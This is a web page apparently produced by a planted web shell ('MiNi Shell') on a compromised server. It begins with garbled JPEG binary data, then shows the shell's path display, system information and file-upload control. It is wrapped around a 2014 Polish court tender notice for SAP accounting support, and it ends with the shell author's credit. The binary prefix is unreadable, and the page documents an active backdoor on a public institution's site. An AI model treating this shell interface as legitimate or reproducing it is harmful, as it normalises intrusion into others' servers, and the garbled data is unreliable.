JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140115/16796-N-2014.html

<p class="kh_header"><b>Rzeszów: Świadczenie specjalistycznych usług wsparcia merytorycznego Zintegrowanego Systemu Rachunkowości i Kadr (ZSRK) opartego na oprogramowaniu firmy SAP AG w  obszarach finansowych FI, FM i PSCD dla pracowników sądów z obszaru apelacji rzeszowskiej</b><br>
<b>Numer ogłoszenia: 16796 - 2014; data zamieszczenia: 15.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Sąd Apelacyjny w Rzeszowie , Al. J. Piłsudskiego 28, 35-001 Rzeszów, woj. podkarpackie, tel. 017 8580200, faks 017 8580205.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rzeszow.sa.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie specjalistycznych usług wsparcia merytorycznego Zintegrowanego Systemu Rachunkowości i Kadr (ZSRK) opartego na oprogramowaniu firmy SAP AG w  obszarach finansowych FI, FM i PSCD dla pracowników sądów z obszaru apelacji rzeszowskiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie przez Wykonawcę na rzecz Zamawiającego usługi profesjonalnego wsparcia przy wdrażaniu systemu ZSRK, opartego na oprogramowaniu firmy SAP AG w obszarach: FI, FM i PSCD. Wsparcie polegać będzie na udzielaniu użytkownikom systemu ZSRK (pracownikom sądów Apelacji Rzeszowskiej) profesjonalnej pomocy w korzystaniu z systemu z użyciem funkcjonalności, jakie posiada system ZSRK oraz 
z uwzględnieniem faktycznych zadań, jakie są do wykonania w systemie produkcyjnym przez użytkowników w obszarach wsparcia FI (Rachunkowość Finansowa), FM (Zarządzanie Budżetem) i PSCD (Rozrachunki z uczestnikami postępowania sądowego)  w łącznym wymiarze do 1 360 godzin zegarowych konsultacji w ramach w/w obszarów wsparcia w lokalizacjach wskazanych przez Zamawiającego. Wykaz wszystkich jednostek z obszaru Apelacji Rzeszowskiej wraz z adresami zawiera Załącznik Nr 8 do  SIWZ.

Przyjęto następujące definicje:
Obszary wsparcia - obszary wdrożenia ZSRK, obejmujące:
a)wsparcie użytkowników obszaru FI (Rachunkowość Finansowa),
b)wsparcie użytkowników obszaru FM (Zarządzanie Budżetem),
c)wsparcie użytkowników obszaru PSCD (Rozrachunki z uczestnikami  postępowania).
Konsultanci Wsparcia - konsultanci realizujący lokalnie Usługi Wsparcia dla obszarów FI, FM, PSCD.
System ZSRK - Zintegrowany System Rachunkowości i Kadr wykonywany na rzecz Ministerstwa Sprawiedliwości zgodnie z Umową nr 10 z dnia 1 sierpnia 2011 r., z którego korzysta Zamawiający oraz jednostki sądownictwa powszechnego apelacji rzeszowskiej.
Usługi Wsparcia - usługi polegające na udzielaniu użytkownikom profesjonalnej pomocy w korzystaniu z systemu ZSRK w określonych obszarach SAP w lokalizacjach użytkowników wskazanych przez Zamawiającego.

Przedmiot zamówienia obejmuje między innymi: 
a.Przygotowanie Planu wsparcia obejmującego:
- opis organizacji procesu wsparcia,
- cele i zasady prowadzenia wsparcia m.in. opis podejścia do świadczenia wsparcia oraz zadania do realizacji przez Zamawiającego w poszczególnych obszarach wsparcia,
- harmonogram świadczenia wsparcia.
b.Wsparcie merytoryczne pracowników Zamawiającego w eksploatacji systemu ZSRK w modułach FI, FM i PSCD we wskazanej lokalizacji w oparciu o Plan wsparcia uzgodniony między Zamawiającym i Wykonawcą.
c.Koordynacja prac we współdziałaniu z Zamawiającym.

Wsparcie w obszarze FI obejmuje, w szczególności:	
1.Tworzenie, zmiana kont dostawców;
2.Tworzenie, zmiana kont dostawców powiązanych;
3.Tworzenie, zmiana kont odbiorców;
4.Sprzedaż usług;
5.Znaki opłaty sadowej dochody - Księgowanie przypisu z tytułu sprzedaży znaków sądowych 221*/720 oraz wpłaty na dochody kwoty przekazanej z PKO 131/221* zamykającej przypis;
6.Noty odsetkowe dla należności;
7.Splata rat pożyczek sędziowskich - wpływ na rachunek bankowy raty pożyczki; 
8.Ewidencja operacji kasowych;
9.Generowanie przelewów;
10.Import i księgowanie wyciągów bankowych;
11.Przekazywanie środków pomiędzy dysponentami;
12.Dzienna prognoza wydatków - raport, który ma przedstawiać wydatki za dany okres, dekadę celem pozyskania informacji jakie środki mamy ujmować do zapotrzebowania TREZOR;
13.Monitowanie przeterminowanych należności;
14.Księgowanie układzie paragrafowym plan i zmiany - FI automatem za pomocą transakcji ZFIKSPB;
15.Księgowanie w układzie paragrafowym wydatku na kontach pozabilansowych - powinno to być na koncie 980 jako wykonanie planu, oraz na koncie 998 jako wykonanie zaangażowania. Księgowanie w układzie paragrafowym zaangażowania - w FI automatem za pomocą transakcji ZFIKSPB;
16.Księgowanie w układzie zadaniowym planu i zmiany - w FI automatem za pomocą transakcji ZFIKSPB;
17.Księgowanie zaangażowania wydatków lat następnych - w FI automatem za pomocą transakcji ZFIKSPB;
18.Przeksięgowanie zaangażowania pomiędzy latami;
19.Wadia w postępowaniu przetargowym i zabezpieczeniu należytego wykonania umowy - depozyty;
20.Znaki opłaty sadowej - księgowanie 2 % prowizji na podstawie otrzymanej faktury z PKO;
21.Ewidencja wydatków strukturalnych;
22.Ewidencja wydatków incydentalnych;  
23.Ewidencja rozrachunków z US, ZUS i PFRON-automatem z listy płac;
24.Fundusz Pomocy Postpenitencjarnej - F.P. Postpenitencjarnej dotyczy tylko FI (konta KG 136,206,853) z PSCD związany jest Fundusz Pomocy Pokrzywdzonym (księgowanie przez konto rozrachunkowe 246 i na kontach pozabilansowych);
25.Podatki i opłaty (zarząd, podatek od nieruchomości);
26.Koszty egzekucji komorniczej pokrywane przez sąd;
27.Zakup usług bez zamówienia;
28.Odpisy aktualizujące należności;
29.Naliczanie odsetek od zobowiązań;
30.Zaliczki i rozliczanie delegacji oraz zwrot kosztów przejazdu;
31.Pożyczki na zaspokojenie potrzeb mieszkaniowych sędziów - udzielona pożyczka dla sędziego; 
32.Pożyczki z ZFSŚ;
33.Pozostałe świadczenia zwrotne z ZFSŚ;
34.Księgowanie odpisów ZFSŚ;
35.Podróż służbowa;
36.Rejestracja danych kadrowych osoby, dla której powstanie rozliczenie delegacji;
37.Rozliczenie i księgowanie podroży służbowej;
38.Rozliczenie zwrotu kosztów za dojazdy - sędziowie;
39.Rozliczenie zwrotu kosztów za dojazdy do pracy - urzędnicy;
40.Zaliczki komornicze udzielane przez Prezesa Sądu;
41.Rozliczenie zaliczki komorniczej udzielonej przez Prezesa Sądu;
42.Weryfikacja zmigrowanych rozrachunków na BO pod względem zgodności kwot na kontach KG oraz FM (pozycji finansowych);
43.Weryfikacja BO na pozostałych kontach KG;
44.Tworzenie żądania zaliczki dla dostawcy (dla porto -Poczta) na koniec m-ca jest rozliczane z fakturą;
45.Raporty - pozycji pojedynczych na dostawcy, odbiorcy, koncie KG, zestawienie obrotów i sald;
46.Rozliczanie zobowiązań zapłaconych, ale nie rozliczonych;
47.Rozliczanie należności;

Wsparcie w obszarze FM obejmuje, w szczególności:	
1.Tworzenie, zmiana analityki klasycznej FM;
2.Tworzenie, zmiana układu zadaniowego;
3.Tworzenie, zmiana źródeł finansowania;
4.Tworzenie, zmiana rozdziałów;
5.Tworzenie, zmiana struktury organizacyjnej FM;
6.Tworzenie planu strukturalnego budżetowania;
7.Zmiana planu strukturalnego budżetowania;
8.Tworzenie planu strukturalnego księgowania;
9.Zmiana planu strukturalnego księgowania;
10.Przygotowanie wersji dla projektu planu finansowego;
11.Przygotowanie wersji dla Ustawy Budżetowej;
12.Zmniejszenie planu na dysponencie (WW);
13.Zmniejszenie planu na dysponencie (DM);
14.Zwiększenie planu na dysponencie (WW);
15.Zwiększenie planu na dysponencie (DM);
16.Przesunięcie środków na podstawie decyzji dysponenta 3 stopnia;
17.Przesunięcie na wniosek dysponenta 3 stopnia;
18.Przesunięcie na wniosek dysponenta 3 stopnia do MS;
19.Przesunięcie w ramach apelacji (dochody);
20.Zaangażowanie środków DIRS;
21.Rejestracja i zmiany zaangażowania z unieruchomień i z rezerwacji;
22.Rejestracja i zmiany zaangażowania z unieruchomień (bieżące);
23.Rejestracja i zmiany zaangażowania z unieruchomień (Bieżące);
24.Blokowanie środków;
25.Zaangażowanie lat przyszłych DWR;
26.Zaangażowanie wynagrodzeń;
27.Zaangażowanie z umów cywilnoprawnych;
28.Przenoszenie zaangażowania (zmiana roku) tzw. przeniesienia obligo;
29.Tworzenie sprawozdań;
30.Raportowanie w malarzu raportów;
31.Raporty standardowe;

Wsparcie w obszarze PSCD obejmuje, w szczególności:	
1.Zakładanie i aktualizacja danych podstawowych zgodnie z przyjętym w KB modelem danych (PB, KU, PU);
2.Operacje główne i częściowe - księgowania występujące w ZSRK: dochody, wydatki, depozyty, sumy na zlecenie, zaliczki komornicze, KNS, FPP;
3.Import wyciągów bankowych (partie płatności i lista wyjaśnień);
4.Ewidencja operacji kasowych;
5.Przelewy, w tym zwroty z dochodów;
6.Księgowanie wyników w FI i FM (klucze uzgodnień);
7.Raporty bieżące;

Pozostałe informacje:
Maksymalna liczba godzin zegarowych usług wsparcia łącznie (dla wszystkich sądów obszaru apelacji rzeszowskiej): 1 360.

Liczba sądów: 17.

Konsultacje mogą się odbywać w godzinach od 7.30 do 15.30 codziennie od poniedziałku  do  piątku /z wyłączeniem sobót, niedziel i świąt/.

Wsparcie  będzie się odbywać we wskazanych przez Zamawiającego lokalizacjach. 

Harmonogram świadczenia usług wsparcia z podziałem na poszczególne jednostki oraz ilości godzin zostanie przygotowany w porozumieniu z Zamawiającym i przekazany  Zamawiającemu  w terminie  7 dni roboczych od dnia podpisania umowy.

Zamawiający  zapewnia:  sale , dostęp do sieci Internet z każdego stanowiska,  dostęp do sieci Internet dla każdego konsultanta,  drukarkę..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 72.00.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium do przedmiotowego postępowania</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczególnego warunku w tym zakresie. Wykonawca winien złożyć oświadczenie o spełnieniu warunku udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie powyższego warunku Wykonawca winien wykazać, że  w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - 
w tym okresie, wykonał a w przypadku świadczeń okresowych lub ciągłych wykonuje na obszarze RP co najmniej 1 projekt w zakresie usług wsparcia podczas eksploatacji systemu SAP ERP o łącznej liczbie  co najmniej 100 roboczodni, dla klienta o strukturze rozproszonej  obejmującej co najmniej 10 jednostek oraz rozwiązywania bieżących problemów w co najmniej 2 z 3 różnych Obszarach wsparcia (FM, FI, PSCD), o wartości nie niższej niż  200 000,00 zł.  brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczególnego warunku w tym zakresie. Wykonawca winien złożyć oświadczenie o spełnieniu warunku udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie powyższego warunku Wykonawca  winien wykazać że dysponuje osobami, które będą osobiście wykonywały przedmiot zamówienia, w tym: 

1) co najmniej jedną osobą która posiada co najmniej trzyletnie doświadczenie w zakresie wdrażania systemu SAP w module FM  w przynajmniej jednej jednostce budżetowej,
2) co najmniej dwoma osobami, z których każda posiada co najmniej trzyletnie doświadczenie 
w zakresie wdrażania systemu SAP w module FI w przynajmniej jednej jednostce budżetowej lub posiada certyfikat potwierdzający zdanie z wynikiem pozytywnym Międzynarodowego Egzaminu Certyfikacyjnego SAP dotyczącego modułu SAP FI oraz doświadczenie we wdrożeniu systemu SAP w przynajmniej jednej jednostce budżetowej
3) co najmniej jedną osobą, która posiada co najmniej trzyletnie doświadczenie w zakresie wdrażania systemu SAP w module PSCD lub FICA (Kontrakt Accounting).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczególnego warunku w tym zakresie. Wykonawca winien złożyć oświadczenie o spełnieniu warunku udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku złożenia oferty przez Wykonawcę, który będzie polegać na wiedzy 
i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących Wykonawcę z innymi podmiotami stosunków, w celu udowodnienia Zamawiającemu, iż Wykonawca będzie dysponował zasobami niezbędnymi do realizacji zamówienia, wraz z ofertą należy złożyć pisemne zobowiązanie tych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu przedmiotowego zamówienia. (jeśli dotyczy) .
Jeżeli uprawnienie do reprezentacji osoby podpisującej ofertę nie wynika z dokumentu, o którym mowa w Rozdziale 11 SIWZ Części I pkt. 5, do oferty należy dołączyć pełnomocnictwa osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza następujące możliwości zmiany Umowy:
1) zmiana terminu na jaki zawarta została Umowa w przypadku niewykorzystania ilości godzin w terminie 3 miesięcy od daty zawarcia umowy zgodnie z zasadami określonymi we wzorze umowy;
2) zmiana osób upoważnionych do realizacji Umowy;
3) powstała możliwość zastosowania nowszych/lepszych rozwiązań realizacyjnych, korzystnych dla Zamawiającego;
4) powstały nieprzewidziane wcześniej okoliczności leżące po stronie Zamawiającego utrudniające realizację Umowy bądź wymuszające zmianę zasad, sposobu i terminu jej realizacji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rzeszow.sa.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sąd Apelacyjny w Rzeszowie
35-001 Rzeszów, Al. J.Piłsudskiego 28.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.01.2014 godzina 09:00, miejsce: Siedziba Zamawiającego (Sąd Apelacyjny w Rzeszowie, 35-001 Rzeszów, Al. J.Piłsudskiego 28) , Biuro Podawcze.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> -.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com